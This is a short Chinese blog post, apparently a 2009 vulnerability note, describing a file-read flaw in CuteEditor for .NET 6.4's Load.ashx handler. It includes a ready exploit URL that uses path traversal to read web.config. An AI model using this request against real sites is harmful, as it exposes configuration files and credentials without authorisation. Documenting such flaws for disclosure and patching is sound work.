查看文章
 
Cute Editor漏洞
2009年05月24日 星期日 上午 9:14

影响版本:
CuteEditor For Net 6.4

程序介绍:

CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。

漏洞分析:

在 Load.ashx 文件中未对file参数进行处理,可以加载任意文件。

漏洞利用:

http://www.xxxxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config


类别:技术文章||添加到搜藏 |分享到i贴吧|浏览(261)|评论 (0)
 
最近读者:
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
     

   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu